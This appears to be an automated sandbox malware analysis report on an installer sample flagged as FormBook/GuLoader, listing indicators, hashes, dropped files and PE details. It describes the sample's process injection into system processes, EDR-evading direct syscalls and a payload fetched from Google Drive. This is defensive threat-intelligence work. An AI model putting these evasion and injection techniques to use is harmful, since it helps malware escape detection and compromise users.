        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
        Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
        Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
        Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
        Behavior Graph ID: 1529338 | Sample: Oogoninia.exe | Startdate: 08/10/2024 | Architecture: WINDOWS | Score: 96
        Contacted hosts: drive.usercontent.google.com; drive.google.com
        Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 2 other signatures

        Process tree as drawn in the graph (numbers in parentheses are the per-process counters shown on the node):
          Oogoninia.exe (1, 511), started
            dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
            signature: Switches to a custom stack to bypass stack traces
            Oogoninia.exe (6), started
              dnsIp: drive.google.com 142.250.80.78, 443, 49705 GOOGLEUS United States
              dnsIp: drive.usercontent.google.com 142.251.40.129, 443, 49706 GOOGLEUS United States
              signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection); Found direct / indirect Syscall (likely to bypass EDR)
              RAVCpl64.exe, injected
                signature: Found direct / indirect Syscall (likely to bypass EDR)
                grpconv.exe, started
                  signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                  explorer.exe (68, 1), injected

        Source | Detection | Scanner | Label | Link
        Oogoninia.exe | 39% | ReversingLabs | Win32.Infostealer.Babar |
        Oogoninia.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        drive.google.com | 142.250.80.78 | true | false | | unknown
        drive.usercontent.google.com | 142.251.40.129 | true | false | | unknown
                                                                                                                    unknown
                                                                                                                    https://outlook.comOexplorer.exe, 0000000F.00000002.5985932285.0000000009DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830063439.0000000009E31000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svgexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-vaexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://drive.usercontent.google.com/Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svgexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://nsis.sf.net/NSIS_ErrorErrorOogoninia.exefalse
                                                                                                                                  unknown
                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-darkexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://www.glamour.com/story/shag-haircut-photos-productsexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trumexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-bexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://nsis.sf.net/NSIS_ErrorOogoninia.exefalse
                                                                                                                                              unknown
                                                                                                                                              https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1pexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonellaexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/Wexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdOogoninia.exe, 00000002.00000001.1095360708.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://www.instyle.com/hair/shag-haircut-face-shapeexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.quovadis.bm0Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&ocexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disapexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs
IP             | Domain                        | Country       | Flag | ASN   | ASN Name | Malicious
142.251.40.129 | drive.usercontent.google.com  | United States |      | 15169 | GOOGLEUS | false
142.250.80.78  | drive.google.com              | United States |      | 15169 | GOOGLEUS | false
                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1529338
                                                                                                                                                                Start date and time:2024-10-08 21:48:18 +02:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 18m 47s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                                                                                                                                Run name:Suspected Instruction Hammering
Number of new started processes analysed:14
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:Oogoninia.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal96.troj.evad.winEXE@5/7@2/2
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 90%
                                                                                                                                                                • Number of executed functions: 65
                                                                                                                                                                • Number of non-executed functions: 300
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • VT rate limit hit for: Oogoninia.exe
Time     | Type            | Description
15:53:01 | API Interceptor | 11445442x Sleep call for process: grpconv.exe modified
15:56:46 | API Interceptor | 193x Sleep call for process: explorer.exe modified
                                                                                                                                                                No context
                                                                                                                                                                No context
                                                                                                                                                                No context
Match                            | Associated Sample Name / URL                                   | SHA 256  | Detection | Threat Name                       | Link   | Context
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe     | Get hash | malicious | LummaC, Vidar                     | Browse | 142.251.40.129, 142.250.80.78
                                 | rStopfodringer.exe                                             | Get hash | malicious | FormBook, GuLoader                | Browse | 142.251.40.129, 142.250.80.78
                                 | H6s8pGsYjg.exe                                                 | Get hash | malicious | Remcos, GuLoader                  | Browse | 142.251.40.129, 142.250.80.78
                                 | asXlZG3aW6.exe                                                 | Get hash | malicious | Remcos, GuLoader                  | Browse | 142.251.40.129, 142.250.80.78
                                 | 15PylGQjzK.exe                                                 | Get hash | malicious | LummaC, Vidar                     | Browse | 142.251.40.129, 142.250.80.78
                                 | Ji7kZhlqxz.exe                                                 | Get hash | malicious | LummaC, Vidar                     | Browse | 142.251.40.129, 142.250.80.78
                                 | Update.js                                                      | Get hash | malicious | NetSupport RAT                    | Browse | 142.251.40.129, 142.250.80.78
                                 | file.exe                                                       | Get hash | malicious | Clipboard Hijacker, Stealc, Vidar | Browse | 142.251.40.129, 142.250.80.78
                                 | file.exe                                                       | Get hash | malicious | LummaC, Vidar                     | Browse | 142.251.40.129, 142.250.80.78
                                 | Transferencia 10-7-2024.exe                                    | Get hash | malicious | FormBook, GuLoader                | Browse | 142.251.40.129, 142.250.80.78
Match: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dll
Associated samples (Sample Name / URL, Detection, Threat Name):
• rStopfodringer.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• rStopfodringer.exe, Detection: malicious, Threat Name: GuLoader
• Transferencia 10-7-2024.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Transferencia 10-7-2024.exe, Detection: malicious, Threat Name: GuLoader
• PEDIDO-144848.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• PEDIDO-144848.exe, Detection: malicious, Threat Name: GuLoader
• transferencia.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• transferencia.exe, Detection: malicious, Threat Name: GuLoader
• KZ710-0038.exe, Detection: malicious, Threat Name: Remcos, GuLoader
Process: C:\Users\user\Desktop\Oogoninia.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 34
Entropy (8bit): 4.35937791471612
Encrypted: false
SSDEEP: 3:oMXADiGWkon:xnGWn
MD5: 5BAD417385FA63549574090876DC680D
SHA1: 84E00066DC079E657BE9AF39E2C9E4EC42F5E527
SHA-256: 8B8CCA2780BD72F608E87BAEC979BBB17706AEFEB8D9F603E53AE144ECFAB71D
SHA-512: EA709BAB31CFAAB4979617C4D1DFF414387F6988BE9F67E70BF7F941A9E7EA4C36CF320CE2518AE0DD9171DF5C46BE85D86D3F6031059A3CB3E79FD58E3F14E2
Malicious: false
Reputation: low
Preview: [Omniregent]..promovable=bugspyt..
Process: C:\Users\user\Desktop\Oogoninia.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11264
Entropy (8bit): 5.7711167426271945
Encrypted: false
SSDEEP: 192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
MD5: 3F176D1EE13B0D7D6BD92E1C7A0B9BAE
SHA1: FE582246792774C2C9DD15639FFA0ACA90D6FD0B
SHA-256: FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
SHA-512: 0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: rStopfodringer.exe, Detection: malicious
• Filename: rStopfodringer.exe, Detection: malicious
• Filename: Transferencia 10-7-2024.exe, Detection: malicious
• Filename: Transferencia 10-7-2024.exe, Detection: malicious
• Filename: PEDIDO-144848.exe, Detection: malicious
• Filename: PEDIDO-144848.exe, Detection: malicious
• Filename: transferencia.exe, Detection: malicious
• Filename: transferencia.exe, Detection: malicious
• Filename: KZ710-0038.exe, Detection: malicious
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\Oogoninia.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 443396
Entropy (8bit): 2.6506140893550536
Encrypted: false
SSDEEP: 3072:BGo1P6b7nn68mltqdZl30ciddrEHJsP2JC:BGQP6b7npmTsp0c0RSJa2JC
MD5: 882A0D458279279C786D38A56F20B77D
SHA1: 010E3688FC482A7E98E8C60BAFFE73F57800EE77
SHA-256: 375D0775B3FD050C4AE89F99ABE1C2D71697D3180B32537EC3DFFC320F81E9C4
SHA-512: D52D469138E7FCD0B392EB8964E624E6FC0D60F23653B30827AC19BBCFF7D62968D4692CCFBDDA57E3D8CD42CFA1BF791321DD6436F48C1C9C4BEC428A8330C0
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\Oogoninia.exe
File Type: data
Category: dropped
Size (bytes): 223893
Entropy (8bit): 7.494218895114718
Encrypted: false
SSDEEP: 6144:Qsi43bNkvibXjg2tgcFhhOGwcjuYpj1CbTD:A43byvib0spDhO/Muq1WD
MD5: AFD211403054996BD48E1A48AC7F7FE2
SHA1: 9EABF5E146F2FCA57906E46B81012F6B3CA02157
SHA-256: 1211392B8B3D61CF8ED4DBED0AD6FF93AE608FAA1E9B124A55B60D33AB281A9D
SHA-512: 6C3A43A1B18D341357E902E317FCBDA55284C34339DDF3E6FBD03481A92AA86D49794F5A7AF488CF29C7D459C2F67BC78EBD5CD0500B55F34823681C5D636FF4
Malicious: false
Process: C:\Users\user\Desktop\Oogoninia.exe
File Type: data
Category: dropped
Size (bytes): 339393
Entropy (8bit): 1.2543469977620876
Encrypted: false
SSDEEP: 1536:JwpZQcXbJ+mf8ME8s+dg5Z90uGaXF9Pl7:W4cX8ncmxhGm
MD5: F6A8488B1B62B7AC3B0979C8FBEABB30
SHA1: 9725896EBC26CCB2CB9060640B9E0D4A0618916F
SHA-256: 34DC9B70D0CE5223A531E499611F1208F3AE85AAEF9973FC27E89190568F8EE2
SHA-512: 88A719685D0972290632C6B5A665184E79A98BE22B76AF28F18056F2E7A721A0B2D3B4A8815BCE562426643E69F998F9E45F3CA62B3288EAAFB71FE89A23AD20
Malicious: false
Process: C:\Users\user\Desktop\Oogoninia.exe
File Type: data
Category: dropped
Size (bytes): 456047
Entropy (8bit): 1.2479728238915362
Encrypted: false
SSDEEP: 768:WqBSYr/TzktUI9ql+6iD8iDu43pfrmQ+PHlyjwkZY51UG90JdfSDUsby4/FApmbO:I3TS9ymKhysrQEkRbwvL3xcbNyFN2Mv
MD5: 9911B32FE219697A738F39AE5766B512
SHA1: DA67EBB043C778DEEA874E1C746483A2B65E533C
SHA-256: 1D3D52ECB41F725DC23080ACB1ACDFEDF29BB5F167DCB75F89AF837888421880
SHA-512: FBF703CD56434BB14C6A1A34878F094BE183D9F638D0F34074F7EE4C9D12DB70A833679B496FCB1E4C6050C418A906221149AAC70035BCDA3C01D4272C0FE3E8
Malicious: false
Process: C:\Users\user\Desktop\Oogoninia.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 276
Entropy (8bit): 4.348758704403097
Encrypted: false
SSDEEP: 6:4s/IdpH+oqGSUkJOlUjvMzJ7HxXEp6JN+qIN2CGZgw9n7FmNIb+:4skpesSUAOlSsJ7BEpg+H2XWwTmCq
MD5: 668A01D3AF55A42FBFDBB1E9DD730B59
SHA1: E0949D489A15516B3CD09F1043543C38E3688F1A
SHA-256: 6A7FEEBFE1F4330E611E6E1B3804619D329A9D3ABD3A3ECBD9D441F884E9999D
SHA-512: CF3F03583667362ADCEA4DEB094513B84D3E275EBCC42A993F9293B7374618A1BA060D4C4BAE446C02B329DDE2A4579C152F54A1F7537A0F83A3E88406509459
Malicious: false
Preview: vulcanizable zoanthidae raalam osullivan,phantasmic oxyluminescence fluidness pickin raadelig.muslimer broder encyclopaedically bessarabian bvt.skyggespillene shellfishes urmi fume panocha imago,troskabseder cypriotes thalassian,udvandringskontorers telfonmontrens bugtalende.
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.328754040700386
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Oogoninia.exe
File size: 633'576 bytes
MD5: 18fb2cccaa9ac71624eaceada006e938
SHA1: a25055a3b29ce0ee64d7e20eccced0f72ec737db
SHA256: 9b00715d77438200a4f54fa8f47ac17aab0cc166e95fc6737c2a78021b69a64e
                                                                                                                                                                                  SHA512:5828d7ee60e66afac8d3650930ed8556adc9693ab32ca872cc16f71382568baa471827cee1162393b7bce2c725965bd92377e7960225e43e00aef87754a2215d
                                                                                                                                                                                  SSDEEP:6144:SyI5s2239XH7ySqrVWOqnBRryl2sIgghQtUnQl8uFfKIn4jma8LIwJzSdfoVLg68:H22tH7L0kel2sInQDlxnPn906OLhsI
                                                                                                                                                                                  TLSH:9FD401533A0968E0F8E21C7154BB8A61457F9F7ABA85342FB3D8730614F224A473E7D6
                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L.....MX.................`....9....
Icon Hash: 8b1985c04404416d
Entrypoint: 0x403180
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x584DCA1F [Sun Dec 11 21:50:23 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b78ecf47c0a3e24a6f4af114e2d1f5de
Signature Valid: false
Signature Issuer: CN="Foliating Escapisms Uloid ", E=Kundskabsriges@Udviklingsmodell.Kat, L=Chertsey, S=England, C=GB
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• 08/04/2024 02:49:58, 08/04/2027 02:49:58
Subject Chain:
• CN="Foliating Escapisms Uloid ", E=Kundskabsriges@Udviklingsmodell.Kat, L=Chertsey, S=England, C=GB
Version: 3
Thumbprint MD5: 89A83BDA74F459F4A955D3D0328F50FD
Thumbprint SHA-1: D2C7FB79BEAD99BD1656CE093680D9EA02FB63C1
Thumbprint SHA-256: 1D5E94B1AF6A4231ED7115D0182A9D7FEE87AD4ABB35283CADEA69B3814DA5AD
Serial: 73760555AB4AD8741E67D8C7F00AB0F68B16BF30
Instruction (entry point disassembly):
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F3744F348C3h
push ebx
call 00007F3744F37831h
cmp eax, ebx
je 00007F3744F348B9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F3744F377ADh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F3744F3489Dh
push ebp
push 00000009h
call 00007F3744F37804h
push 00000007h
call 00007F3744F377FDh
mov dword ptr [007A1F44h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [007A1FF8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079D500h
call dword ptr [00407174h]
push 00409188h
push 007A1740h
call 00007F3744F37427h
call dword ptr [0040709Ch]
mov ebp, 007A8000h
push eax
push ebp
call 00007F3744F37415h
push ebx
call dword ptr [00407154h]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c3000 | 0x28340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x99758 | 0x1390 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e4a | 0x6000 | 30c42419b2e69d0fb178ad82fde5a6a6 | False | 0.6707356770833334 | data | 6.461674766148295 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1246 | 0x1400 | 43fab6a80651bd97af8f34ecf44cd8ac | False | 0.42734375 | data | 5.005029341587408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x399038 | 0x400 | 295703f29cbf0cc87537f54786ed1d01 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a3000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c3000 | 0x28340 | 0x28400 | 0a923a42d1a39b5e7ff4cbf67045065c | False | 0.21775524068322982 | data | 4.016272150271427 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c3358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.1348337868212469
RT_ICON | 0x3d3b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.24942190456169855
RT_ICON | 0x3dd028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.286090573012939
RT_ICON | 0x3e24b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.2502952290977799
RT_ICON | 0x3e66d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3522821576763486
RT_ICON | 0x3e8c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.37828330206378985
RT_ICON | 0x3e9d28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4668032786885246
RT_ICON | 0x3ea6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5106382978723404
